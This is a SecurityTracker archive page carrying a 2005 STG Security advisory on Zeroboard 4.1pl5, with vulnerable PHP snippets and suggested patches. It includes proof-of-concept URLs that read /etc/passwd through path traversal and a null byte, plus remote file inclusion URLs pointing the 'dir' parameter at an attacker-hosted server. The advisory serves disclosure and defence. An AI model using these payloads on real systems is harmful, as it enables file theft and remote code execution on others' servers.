Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Zeroboard Discloses Files to Remote Users and Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1012884 |
|
SecurityTracker URL: http://securitytracker.com/id/1012884
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 13 2005
|
Impact:
Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 4.1pl5 and prior versions
|
Description:
Jeremy Bae at STG Security reported several vulnerabilities in Zeroboard. A remote user can execute arbitrary commands on the target system. A remote user can view files on the target system.
A remote user can supply a specially crafted URL to view files on the target system with the privileges of the target web service. Some demonstration exploit URLs are provided:
http://[target]/_head.php?_zb_path=../../../../../etc/passwd%00
http://[target]/include/write.php?dir=../../../../../etc/passwd%00
http://[target]/outlogin.php?_zb_path=../../../../../etc/passwd%00
The 'print_category.php' script does not properly validate user-supplied input in the 'dir' parameter. A remote user can supply a specially crafted URL to cause arbitrary PHP code from a remote location to be included and executed on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service. A demonstration exploit URL is provided:
http://[target]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/
Several zero_vote scripts are also affected. Some demonstration exploit URLs are provided:
http://[target]/skin/zero_vote/login.php?dir=http://[attacker]/
http://[target]/skin/zero_vote/setup.php?dir=http://[attacker]/
http://[target]/skin/zero_vote/ask_password.php?dir=http://[attacker]/
The vendor was notified on January 1, 2005.
Jeremy Bae at STG Security and a member of the Korean security community are credited with discovering these flaws.
|
Impact:
A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
A remote user can view files on the target system with the privileges of the target web service.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.zeroboard.com/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 13 Jan 2005 15:52:32 +0900
Subject: STG Security Advisory: [SSA-20050113-25] ZeroBoard multiple vulnerabilities
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
STG Security Advisory: [SSA-20050113-25] ZeroBoard multiple vulnerabilities
Revision 1.1
Date Published: 2004-12-31 (KST)
Last Update: 2005-1-13
Disclosed by SSR Team (advisory@stgsecurity.com)
Summary
=======
ZeroBoard is one of widely used web BBS applications in Korea. However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.
Vulnerability Class
===================
Implementation Error: Input validation flaw
Impact
======
High : arbitrary commands execution.
Affected Products
================
ZeroBoard 4.1pl5 and prior
Vendor Status: NOT FIXED
========================
2004-12-31 Vulnerabilities found.
2005-01-01 vendor contact, but he didn't replied.
2005-01-10 STG Security, Inc. customers notified.
2004-01-13 Official release.
Details
=======
Vulnerability 1 : File disclosure vulnerability
- - - ------------------------------------
- - - - Proof of concept
http://[victim]/_head.php?_zb_path=../../../../../etc/passwd%00
http://[victim]/include/write.php?dir=../../../../../etc/passwd%00
http://[victim]/outlogin.php?_zb_path=../../../../../etc/passwd%00
- - - - Environment
php.ini: magic_quotes_gpc = off
outlogin.php is only vulnerable on PHP 5.x.
- - - - Description
PHP has a feature discarding the input values containing null characters
when magic_quotes_gpc = off
- - - - Part of vulnerable source, _head.php.
- - - ----
if(eregi(":\/\/",$_zb_path)) $_zb_path="";
include $_zb_path."lib.php";}
- - - ----
- - - - Part of vulnerable source, include/write.php.
- - - ----
if(eregi(":\/\/",$dir)) $dir=".";
include $dir."/write.php";
- - - ----
- - - - Part of vulnerable source, outlogin.php.
- - - ----
if(eregi(":\/\/",$_zb_path)) $_zb_path="./";
[snip]
@include $_zb_path."_head.php";
- - - ----
Vulnerability 2 : PHP source injection vulnerability
- - - ------------------------------------
- - - - Proof of concept
http://[victim]/include/print_category.php?setup[use_category]=1&dir=http://
[attacker]/
- - - - Environment
php.ini: register_globals = On, allow_url_fopen = On
- - - - Reason
Uninitialized $dir variable in print_category.php
- - - - Part of vulnerable source, include/print_category.php
- - - ----
include "$dir/category_head.php";
- - - ----
Vulnerability 3 : PHP source injection vulnerability
- - - --------------------------------------
- - - - Proof of concept
http://[victim]/skin/zero_vote/login.php? dir=http://[attacker]/
http://[victim]/skin/zero_vote/setup.php? dir=http://[attacker]/
http://[victim]/skin/zero_vote/ask_password.php? dir=http://[attacker]/
http://[victim]/skin/zero_vote/error.php? dir=http://[attacker]/
- - - - Environment
php.ini: allow_url_fopen = On
- - - - Reason
Uninitialized $dir variables in login.php, setup.php, ask_password,php and
error.php.
- - - - Part of vulnerable source, skin/zero_vote/login.php
- - - ----
<? include "$dir/value.php3"; ?>
- - - ----
- - - - Part of vulnerable source, skin/zero_vote/setup.php
- - - ----
<? include "$dir/value.php3"; ?>
- - - ----
- - - - Part of vulnerable source, skin/zero_vote/ask_password.php
- - - ----
<? include "$dir/value.php3"; ?>
- - - ----
- - - - Part of vulnerable source, skin/zero_vote/error.php
- - - ----
<? include "$dir/value.php3"; ?>
- - - ----
Workaround
==========
Without official patches of these vulnerabilities, modify the vulnerable
sources as following recommendations.
Vulnerability 1: As of zboard 4.1pl5
- - - ----------------------------
Modify the 13rd line of _head.php as following:
if ( eregi(":\/\/",$_zb_path) || eregi("\.\.",$_zb_path)) $_zb_path="";
Modify the 16th line of include/write.php as following:
if( eregi(":\/\/",$dir) || eregi("\.\.",$dir)) $dir=".";
Modify the 50th line of outlogin.php as following:
if ( eregi(":\/\/",$_zb_path) || eregi("\.\.",$_zb_path)) $_zb_path="./";
Vulnerability 2: As of zboard 4.1pl5
- - - ----------------------------
Insert the following code at the 3rd line of include/print_category.php,
if( eregi(":\/\/",$dir) || eregi("\.\.",$dir)) $dir=".";
Vulnerability 3: As of zboard 4.1pl5
- - - ----------------------------
Modify the 1st line of skin/zero_vote/login.php, the 42nd line of
skin/zero_vote/setup.php, the 1st line of skin/zero_vote/ask_password.php,
and the 1st line of skin/zero_vote/error.php as following:
<? if(eregi(":\/\/",$dir) || eregi("\.\.",$dir)) $dir="."; include
"$dir/value.php3"; ?>
Credits
======
Jeremy Bae at STG Security for Vulnerability 1 and 2.
A Korean security community member for Vulnerability 3 which has been
unofficially released since March 2004.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
iQA/AwUBQeYanT9dVHd/hpsuEQLRMgCgrMDlUGEoToTuBaqDxpQELJ3Wk4MAoMGZ
c6jo0Xozk4lLwuhPUUe+Ktg1
=v3Dz
-----END PGP SIGNATURE-----
|
|
Go to the Top of This SecurityTracker Archive Page
|
